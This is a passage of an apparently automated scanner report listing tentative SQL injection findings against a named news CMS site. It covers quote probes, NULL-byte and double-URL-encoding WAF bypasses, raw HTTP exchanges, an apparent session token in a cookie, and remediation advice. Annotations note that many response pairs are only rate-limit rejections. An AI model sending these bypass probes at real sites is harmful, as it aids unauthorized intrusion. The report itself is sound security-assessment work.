NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content_management_solutions/news/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/news/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4679164
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:41:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7113
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp4
Content-Length: 71190


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.39. http://www.townnews365.com/content_management_solutions/reader_commenting/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/reader_commenting/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Response 2 below is an HTTP 417 "Rate limit exceeded for engine pages", so the second request was rejected by a rate limiter before reaching the application; this pair does not show the error disappearing and the test needs repeating at a lower request rate.

Request 1

GET /content_management_solutions'/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions''/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:42:56 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.40. http://www.townnews365.com/content_management_solutions/reader_commenting/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/reader_commenting/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content_management_solutions/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2698136
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:40:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://www.townnews365.com/content_management_solutions/news/article_e7c70c41-704a-56a4-8535-7c2c71b2427a.html#user-comment-area
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0963
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp14
Content-Length: 760
Connection: close
X-Cache-Info: cached

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<base href="http://www.townnews365.com/content/tncms/live/" />

<title>301 Moved Permanently</title>
</head>
<body>
<script type='tex
...[SNIP]...

2.41. http://www.townnews365.com/content_management_solutions/topic_page/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/topic_page/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content_management_solutions/topic_page/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/topic_page/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3951648
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:40:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.8565
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 38597
Connection: close
X-Cache-Info: cached

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href="ht
...[SNIP]...

2.42. http://www.townnews365.com/content_solutions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_solutions/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with 2.39, Response 2 here is a 417 rate-limit rejection rather than a clean page, so the comparison is between two infrastructure responses and carries no SQL signal.

Request 1

GET /content_solutions/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_solutions/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:19 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.43. http://www.townnews365.com/creatives_solutions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /creatives_solutions/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Response 2 below is a 417 rate-limit rejection, so the "disappearance" of the error is not demonstrated by this pair.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /creatives_solutions%2527/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /creatives_solutions%2527%2527/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:26 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.44. http://www.townnews365.com/creatives_solutions/ad_creation/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /creatives_solutions/ad_creation/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Response 2 below is a 417 rate-limit rejection, so this pair does not show the error disappearing.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /creatives_solutions/ad_creation/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /creatives_solutions/ad_creation/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:23 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.45. http://www.townnews365.com/creatives_solutions/enhanced_special_sections/demonstration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /creatives_solutions/enhanced_special_sections/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Response 2 below is a 417 rate-limit rejection, so this pair does not show the error disappearing.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /creatives_solutions/enhanced_special_sections/demonstration/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /creatives_solutions/enhanced_special_sections/demonstration/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:19 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.46. http://www.townnews365.com/distribution_solutions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /distribution_solutions/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Response 2 below is a 417 rate-limit rejection, so this pair does not show the error disappearing.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /distribution_solutions/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /distribution_solutions/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:23 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.47. http://www.townnews365.com/distribution_solutions/rss_feeds/ [TNNoMobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /distribution_solutions/rss_feeds/

Issue detail

The TNNoMobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TNNoMobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /distribution_solutions/rss_feeds/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%00'; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.9.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /distribution_solutions/rss_feeds/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%00''; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.9.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3702792
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.8479
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp11
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 64518


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.48. http://www.townnews365.com/image_16e69036-3e95-11df-b5f4-001cc4c03286.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /image_16e69036-3e95-11df-b5f4-001cc4c03286.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The captured pair is a bare 503 "Server Too Busy" followed by a 404 "Element not valid" from the image tier; neither response contains database error text.

Request 1

GET /image_16e69036-3e95-11df-b5f4-001cc4c03286.html' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /image_16e69036-3e95-11df-b5f4-001cc4c03286.html'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:18 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.49. http://www.townnews365.com/mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Response 2 below is a 417 rate-limit rejection, so this pair does not show the error disappearing.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:27 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.50. http://www.townnews365.com/search/ [f parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /search/

Issue detail

The f parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the f parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Of the findings in this section this is the only one on a genuine query parameter of a search endpoint, which makes it the most worth re-testing by hand; the captured pair itself, however, is a 503 followed by a 417 rate-limit rejection and shows no SQL signal.

Request 1

GET /search/?q=&t=article&l=100&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /search/?q=&t=article&l=100&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:49 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.51. http://www.townnews365.com/shared-content/swfobject/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /shared-content/swfobject/swfobject.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /shared-content%00'/swfobject/swfobject.js HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/content_management_solutions/about_blox/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /shared-content%00''/swfobject/swfobject.js HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/content_management_solutions/about_blox/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:52 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.52. http://www.townnews365.com/shopping_solutions/yp_top_ads/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /shopping_solutions/yp_top_ads/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /shopping_solutions/yp_top_ads/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /shopping_solutions/yp_top_ads/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3840420
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:45:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4831
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 43870
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.53. http://www.townnews365.com/shopping_solutions/yp_top_ads/demonstration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /shopping_solutions/yp_top_ads/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping_solutions/yp_top_ads/demonstration/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /shopping_solutions/yp_top_ads/demonstration/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3643020
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:45 GMT
